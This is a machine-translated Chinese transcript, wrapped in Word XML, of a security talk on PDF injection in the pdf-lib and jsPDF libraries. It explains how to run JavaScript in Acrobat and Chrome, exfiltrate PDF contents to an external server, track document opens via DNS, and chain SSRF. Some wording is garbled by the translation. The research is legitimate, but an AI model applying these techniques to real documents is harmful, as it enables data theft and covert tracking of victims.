        <w:t xml:space="preserve">在 Acrobat 或 Chrome 中，可以使用 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>app.alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t xml:space="preserve"> 命令，它会告诉你注入是否成功。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>攻击成功了，但如果你</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>存在盲注漏洞</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>例如盲注</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t xml:space="preserve"> PDF 注入，那就麻烦了。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>你根本不知道PDF文件的结构会是什么样的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>实际上，你不会直接操作PDF文件，而是由其他人操作，但你完全不知道那个PDF文件的内容。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>看起来你可以使用 JavaScript 中的提交表单函数或提交表单的回调函数。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>在 PDF 操作中执行该功能，然后一旦您确定了该功能，</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>受害者点击了 PDF 文件中的某个链接，然后你的漏洞利用程序就可以构建你的漏洞利用程序了。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>利用提交表单功能窃取未知 PDF 文件的内容</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>或者，您也可以在不使用 JavaScript 的情况下，通过提交表单操作来窃取 PDF 的内容。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>所以，我测试了大约八个库，直到发现两个存在漏洞的库。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>易受攻击的[音乐] 第一个易受攻击的库叫做pdf连字符库</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t xml:space="preserve">这是一个 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t xml:space="preserve"> 模块，可以与 Node 配合使用，下载量约为 52，远超 52000 次。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>每周下载量，但他们犯了一个相当大的错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>屏幕上显示的这段 JavaScript 代码允许你……</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>生成 PDF 文件后，您可以创建注释并</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t xml:space="preserve">该注释有一个名为 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>pdfstring.off</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t xml:space="preserve"> 的辅助函数。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">所以如果我们放大来看，这就是存在漏洞的代码，也就是 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t xml:space="preserve"> 属性。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>正在使用这个函数，你的输入会进入这个函数内部，你可以做什么？</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>你可以插入括号来跳出该文本流或注释 URI 流。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>你可以破坏你的，你可以注入你自己的PDF代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我遇到的下一个库是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>jspdf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>，它有超过25万个文件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>每周下载量都很高，所以它很受欢迎，而且你还可以自定义注释。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>使用他们的 API，他们的 API 中有一个 URL 属性。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t xml:space="preserve"> 属性与之前的示例一样，容易受到 PDF 注入攻击。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>所以，你的输入会出现在这个 URL 属性中，你可以插入括号来注入内容。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>你自己的pdf代码，现在我们来谈谈如何利用漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>在 Acrobat 上进行注射，所以这是 PDF 的一个警报。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>注入，就像你在 JavaScript 中有一个 alert 注入一样，这和它本质上是一样的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>首先，我们需要跳出 PDF 字符串，这是 PDF 注入的样式。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t xml:space="preserve">使用右括号，我们使用 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t xml:space="preserve"> 字典来定义我们的 JavaScript 代码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>因此，在本例中，app.alert1 我们使用打开操作来修复现有操作。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>加上括号，然后会弹出一个提示框，证明我们的注射成功了。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我在很多不同的注射中都使用这种注射方式。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>证明我的注射有效，然后在此基础上进行改进。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>所以，尽管我的 JavaScript 代码已经可以执行，但还是遇到了一些挑战。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>这些挑战源于 Acrobat JavaScript 的局限性。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>你无法访问 DOM，你无法读取 cookie，你只有基本的选择。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>可供选择的对象有限，所以尽管你有 JavaScript 执行权限，但你仍然受到限制。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>关于您可以在 Acrobat JavaScript 中执行的操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>但我想，我们可以提取PDF的内容，所以我们用到了JavaScript。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>执行过程中，为什么我们无法获取pdf的内容？所以我在这里注入了代码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>提交表单功能并将其发送到外部协作者的 URL，</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>将提交作为属性传递给提交表单的函数对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>如果指定了 PDF 文件，则会窃取整个 PDF 文件的内容。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>这</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>很</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>酷，因为如果你</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>能盲注</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>PDF文件，就能获取PDF的全部内容。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>无论用户点击PDF文件的任何位置，都会打开该PDF文件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>你也可以不用 JavaScript 来实现这一点，这在客户方面可能很重要。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>虽然不支持 JavaScript，但允许使用提交表单操作，所以我在这里注入了 JavaScript 代码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我添加了一个新的注解，指定了提交表单的操作，并为其提供了一个外部协作者的 URL。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>然后传递左括号以继续。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>其余代码我使用了标志字典键</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>如果您指定 256，则表示全部内容</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:lastRenderedPageBreak/>
        <w:t>PDF文件将提交到该外部位置，因此这非常方便。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>盲注</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>pdf文件，我找到了一种设置陷阱的方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>整个PDF文档，所以无论受害者点击页面上的哪个位置……</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>将会调用此 JavaScript 或提交表单操作。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>首先，我注入一个单独的注解，指定损坏的字典键。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>指定注释在页面上的可点击位置，在本例中为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>通过设置 x 和 y 坐标以及宽度和高度，即可使整个页面可点击。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>然后我利用现有的括号完成注入。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>您还可以在 Acrobat 中自动执行，这非常强大，因为您可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>注入注释后，受害者只需打开 PDF 文件即可。您可以使用以下方法实现此操作：</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t xml:space="preserve">一旦指定了 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>pv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t xml:space="preserve"> 字典键，注解就会执行。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>页面加载时会自动显示一个电脑词典密钥。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>当 PDF 文件关闭时，此操作会执行，因此您可以进行注入。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>通过盲注注入</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>，受害者可以打开PDF文件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>你知道受害者何时打开它，何时关闭它，这非常有效。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t xml:space="preserve">于是我找到了最短的 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>xs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t xml:space="preserve"> pdf 向量，</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>这里页面上已经有了现有的和弦，在 Acrobat 中，您可以重复使用现有的注释，而无需考虑其他情况。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>它是什么，所以在这个例子中它是一个URI，但它允许你注入……</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>你为当前注解赋予自己的值，并执行 JavaScript，这就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我能找到的最短的 vector2 值，所以很棒，我们注入了一个 JavaScript 代码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>它使用现有的操作，我们称之为警报函数，并使用现有的括号。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>完成注射，所以我觉得这可能是最短的注射时间了。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>PDF注入向量是可能的，但我敢打赌你找不到更短的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我已经提到过，我们可以打开，你可以跟踪pdf文件何时被打开。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>注释完成后会自动关闭，但是加载 PDF 文件时呢？</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>从文件系统的角度来看，存在一些挑战。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>POST 请求被阻止，因此系统会提示用户是否允许或拒绝这些请求。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>这对攻击者来说可不太好，有没有办法可以……</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>无论用户点击“允许”还是“拒绝”，都会自动发出请求。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我写了一个枚举器来实现这个功能，所以我写了一个枚举器来循环遍历</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>调用所有对象并执行每个函数</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>并将协作者的 URL 作为参数传递，我跳过了我知道的那些函数。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>需要提示，然后等待结果。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我发现了一个功能，叫做 CBS 共享评论，如果离线对话哇哦，好的，那真是个……</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>一口气说完，倒是挺有意思的。嗯，那么接下来会发生什么呢？</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>无论你选择哪个选项，它都会发出 DNS 请求。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>这个提示</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>非常</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>棒，因为我们可以跟踪用户何时打开或关闭pdf文件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:lastRenderedPageBreak/>
        <w:t>我们可以使用DNS来枚举PDF文件的内容。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>然后窃取PDF文件的内容，对话框如下所示。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>所以当你执行该函数时，它会发出 DNS 请求，但提示 Acrobat Reader 无法解析。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>连接到审核服务器后，会显示反向 DNS，所以我知道这一点。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>这已经正常工作了，我在 Burp 中收到了一条交互信息，告诉我……</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>请求已发出，您有两个选择：离线工作或继续尝试。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>用户点击哪个都无所谓，这很棒，这样你就可以追踪用户何时打开和关闭PDF文件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>无需任何用户交互</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>所以，我对利用 Acrobat 漏洞感到非常满意，但我也想利用 Chrome 漏洞。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>所以我尝试在 Chrome 上使用我现有的注入脚本，但它们都失败了。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>所以我尝试了所有现有的向量，但它们都不起作用，所以我尝试覆盖 URL。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>所以，我没有执行 JavaScript，而是尝试更改 URL，为此我注入了一个额外的代码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t xml:space="preserve">在 annotations 数组中添加注解，并指定一个 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t xml:space="preserve"> 和一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>外部网址，嗯，这让我能够</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>覆盖 URL 这点很棒，这样我就可以覆盖现有的操作了。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>通过一项新操作，URL 将会改变，但我们无法从中提取 PDF 文件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>所以，确实存在一些挑战。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>Acrobat 矢量图不起作用，JavaScript 在注释中不起作用，我们可以使用它。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>可以覆盖 URL，这算是一个进步，但仍然不如……那么令人印象深刻。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>执行 JavaScript，那么我们能否让 JavaScript 在 Chrome 中运行呢？</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>这是我第一次尝试从PDF文件中创建JavaScript执行程序。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>在 Chrome 浏览器中注入漏洞，正如你所看到的，代码量很大。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>大量的PDF注入，其中一些部分需要</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>PDF 文件中不同对象的知识和引用，当然我们无法拥有，因为我们</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我对这个pdf文件一无所知，所以我设法删减了很多内容。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>代码和这个注入向量</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>这将首先在 Chrome 上执行 JavaScript，字段类型是必需的，所以在</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>在这种情况下，按钮的值并不重要，我们只是把它放在这里。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>但是，无论何时，如果您将注释链接到提交，都会出现这种情况。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>表单按钮后，Chrome 将允许在该注解上执行 JavaScript 代码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>这非常方便，但也遇到了一些挑战。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>不需要了解PDF的任何内容，这很棒，但我们受到PDF的限制。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>以及 JavaScript 的功能，以便我可以调用提交表单函数。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>但这并不能让我窃取PDF的全部内容，所以它并不支持所有功能。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>Acrobat 支持的功能有很多，所以我遇到了一些需要解决的挑战。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>所以我当然写了一个枚举器，并枚举了每一个元素。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>对象和属性，首先是一个 for 循环，然后使用 get 函数。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>然后收集所有属性的属性名称，因为 Acrobat 不允许这样做。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:lastRenderedPageBreak/>
        <w:t>控制台对</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>象</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>就像 Acrobat 那样，嗯，我需要输出数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>分段显示，这样我就可以把所有信息收集到一个提示框里。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>所以在这里我给这些代码块添加了各种属性。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>处理数据，然后输出每个数据块，得到一个属性列表。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>在该对象的支持下，我发现了一些很棒的获取页面的函数</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t xml:space="preserve">单词数量 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>获取第</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t xml:space="preserve"> n 页单词 这些听起来真的很有希望窃取内容</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我从PDF文件中提取文本的方法如下</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我使用 Chrome 浏览器注入 PDF 文件，所以使用了基础注入方式。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>如前所述，我们注入表单按钮</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>在父字典键上，然后我们注入我们的注解</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我用 JavaScript 遍历页面上的单词，所以首先我使用 get 方法。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t xml:space="preserve">我先获取页码，然后使用“获取第 n 页第 n </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00976019">
        <w:t>单词”来获取页面上的特定单词。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>然后我将它们存储在一个数组中，然后输出每个或</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>页面上的文字会显示出来，这样我就可以把PDF文件提交给……</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>由于服务器位于外部，用户必须点击页面上的任意位置，我才能窃取该页面的内容。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>未知的 PDF 文件，完全无法识别，它可能会发送到我的服务器。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我想到的另一个很棒的技术是通过PDF注入使用SSRF。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>这真的很令人兴奋，因为我将允许你一起更改不同的漏洞。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>所以，我再次使用了我之前提到的基础Chrome注入方法，但这次我没有注入……</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>我在表单按钮中插入了一个文本字段，并将该文本字段赋值给该按钮。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>参数名称，因此可以使用字典键 t 指定参数名称，也可以使用字典 v 指定参数名称。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>键值对可以让你指定参数值，然后我使用提交表单功能传递这些参数。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>提交表单函数的参数允许我发出请求，以下是请求的内容。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>有趣的是，虽然没有内容类型标头，但我可以控制它。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>帖子中的帖子参数，所以我在这里通过工具栏进行控制。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>有趣的是，你还可以在请求中嵌入原始换行符。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>这对于其他攻击（例如请求走私）可能很有用。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>在利用 Chrome 注入漏洞之后，我想，有没有一种漏洞可以同时在客户端和客户端上都有效呢？</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>那会很有意思，而我能做到这一点的方法是重用现有的注解。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>因此，这里我们重用现有的注释，然后是一个 URI，但我们注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>JavaScript Acrobat 非常支持这种做法，并且它使用现有的注解来执行。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>在 Acrobat 中，我们插入一个带有特定矩形的附加注释。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>用Chrome浏览器，这样它就会覆盖半个页面之类的，然后当受害者点击那个图标时……</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>然后它会在 Chrome 浏览器上执行 JavaScript 代码，如果他们点击现有的注释，就会生效。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:lastRenderedPageBreak/>
        <w:t>现在我想给你们演示一下Acrobat的用法。</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t>实时Chrome注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00976019">
        <w:br/>
        <w:t xml:space="preserve">[音乐] 这里我们有 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00976019">
        <w:t>jspdf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00976019">
